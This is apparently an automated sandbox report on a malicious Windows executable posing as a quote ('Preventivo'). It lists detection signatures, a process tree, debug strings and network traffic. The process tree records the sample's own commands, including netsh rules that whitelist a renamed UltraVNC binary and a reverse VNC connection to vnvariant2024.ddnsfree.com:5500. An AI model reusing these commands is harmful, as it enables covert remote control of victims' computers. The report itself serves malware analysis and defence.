Edit tour

Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name:	Preventivo24.01.11.exe
Analysis ID:	1379424
MD5:	32f35b78a3dc5949ce3c99f2981def6b
SHA1:	18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256:	0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags:	exe
Infos:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Contains VNC / remote desktop functionality (version string found)

Contains functionalty to change the wallpaper

Modifies the windows firewall

Uses cmd line tools excessively to alter registry or file data

Uses netsh to modify the Windows network and firewall settings

Binary contains a suspicious time stamp

Checks for available system drives (often done to infect USB drives)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops certificate files (DER)

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

May use bcdedit to modify the Windows boot settings

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE / OLE file has an invalid certificate

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Uses taskkill to terminate processes

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

System is w10x64

Preventivo24.01.11.exe (PID: 5924 cmdline: C:\Users\user\Desktop\Preventivo24.01.11.exe MD5: 32F35B78A3DC5949CE3C99F2981DEF6B)

msiexec.exe (PID: 7216 cmdline: C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706008514 " AI_EUIMSI=" MD5: 9D09DC1EDA745A5F87553048E57620CF)

viewer.exe (PID: 7424 cmdline: C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 7468 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7576 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

WMIC.exe (PID: 7592 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 7600 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

Acrobat.exe (PID: 7676 cmdline: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)

AcroCEF.exe (PID: 7932 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

AcroCEF.exe (PID: 7212 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1752,i,9597563481280373609,10748529696492250759,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)

viewer.exe (PID: 7704 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\c.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 7876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mode.com (PID: 8000 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

cmd.exe (PID: 7536 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 7804 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

cmd.exe (PID: 7628 cmdline: C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 7804 cmdline: cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

mode.com (PID: 2840 cmdline: Mode 90,20 MD5: FB615848338231CEBC16E32A3035C3F8)

netsh.exe (PID: 2132 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplication" mode=ENABLE scope=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

netsh.exe (PID: 5924 cmdline: netsh firewall add allowedprogram program="C:\Games\taskhost.exe" name="MyApplicatio" mode=ENABLE scope=ALL profile=ALL MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

WMIC.exe (PID: 8216 cmdline: wmic process where (name="taskhost.exe") get commandline MD5: E2DE6500DE1148C7F6027AD50AC8B891)

findstr.exe (PID: 8244 cmdline: findstr /i "taskhost.exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)

taskhost.exe (PID: 8488 cmdline: C:\Games\taskhost.exe -autoreconnect ID:5383948 -connect vnvariant2024.ddnsfree.com:5500 -run MD5: 663FE548A57BBD487144EC8226A7A549)

viewer.exe (PID: 8508 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\once.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 8600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\once.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

viewer.exe (PID: 8516 cmdline: C:\Games\viewer.exe /HideWindow C:\Games\cmmc.cmd MD5: 29ED7D64CE8003C0139CCCB04D9AF7F0)

cmd.exe (PID: 8608 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8704 cmdline: C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

cmd.exe (PID: 8724 cmdline: C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

reg.exe (PID: 8740 cmdline: Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

timeout.exe (PID: 8540 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8960 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 9108 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 2840 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 8456 cmdline: timeout /t 20 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

timeout.exe (PID: 7800 cmdline: timeout /t 1 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 7968 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 736 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 888 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8004 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

taskkill.exe (PID: 8400 cmdline: taskkill /im rundll32.exe /f MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)

timeout.exe (PID: 8444 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Snort Signatures

ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) - Source IP: 192.168.2.5 - Destination IP: 93.184.216.34

Timestamp:	192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308
SID:	2834928
Source Port:	49705
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Preventivo24.01.11.exe

Virustotal: Detection: 17%

Perma Link

Source: Preventivo24.01.11.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: Preventivo24.01.11.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B0D5000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 00000029.00000002.3495148727.000000000022C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source:	Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source:	Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.1664234459.00000000099BB000.00000004.00000020.00020000.00000000.sdmp, shi6E82.tmp.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI6F00.tmp.0.dr, MSI6FDC.tmp.0.dr, MSI6FFC.tmp.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1649858263.00000000099B0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source:	Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000B1BA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.1686217786.000000000AE50000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000006.00000000.1690846297.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000006.00000002.1875272128.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000002.3495250511.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000000F.00000000.1747475344.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000002.1871122900.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002A.00000000.1862131314.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.1877402564.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.1863267198.0000000000659000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: a:	Jump to behavior

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE9080 FindFirstFileW,FindClose,CloseHandle,CloseHandle,	0_2_00FE9080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00EA5220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,	0_2_00EA5220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBD700 FindFirstFileW,GetLastError,FindClose,	0_2_00FBD700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_01008B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_01008B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FBCDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose,	0_2_00FBCDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FE3210 FindFirstFileW,FindClose,	0_2_00FE3210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00F9F570 FindFirstFileW,FindNextFileW,FindClose,	0_2_00F9F570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	0_2_00FF3790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FF3C10 FindFirstFileW,FindClose,	0_2_00FF3C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	Code function: 0_2_00FCBFF0 FindFirstFileW,FindClose,FindClose,	0_2_00FCBFF0
Source: C:\Games\taskhost.exe	Code function: 41_2_000BEC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose,	41_2_000BEC90

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe

Code function: 0_2_00FF2400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection,

0_2_00FF2400

Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll	Jump to behavior
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe	File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80

Source: global traffic

TCP traffic: 192.168.2.4:49749 -> 140.228.29.110:5500

Source: Joe Sandbox View	IP Address: 52.202.204.11 52.202.204.11
Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34
Source: Joe Sandbox View	IP Address: 93.184.216.34 93.184.216.34

Source: global traffic	HTTP traffic detected: OPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-aliveAccept: /Access-Control-Request-Method: GETAccess-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-keyOrigin: https://rna-resource.acrobat.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Mode: corsSec-Fetch-Site: cross-siteSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=RO&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1Host: p13n.adobe.ioConnection: keep-alivesec-ch-ua: "Chromium";v="105"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01x-adobe-uuid: a4ecfc44-3976-4051-8c45-0a7e26b55a37x-adobe-uuid-type: visitorIdx-api-key: AdobeReader9sec-ch-ua-platform: "Windows"Origin: https://rna-resource.acrobat.comAccept-Language: en-US,en;q=0.9Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://rna-resource.acrobat.com/Accept-Encoding: gzip, deflate, br
Source: global traffic	HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1Host: armmf.adobe.comConnection: keep-aliveAccept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brIf-None-Match: "78-5faa31cce96da"If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT

Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 52.202.204.11
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
Source: unknown	TCP traffic detected without corresponding DNS query: 23.54.200.159
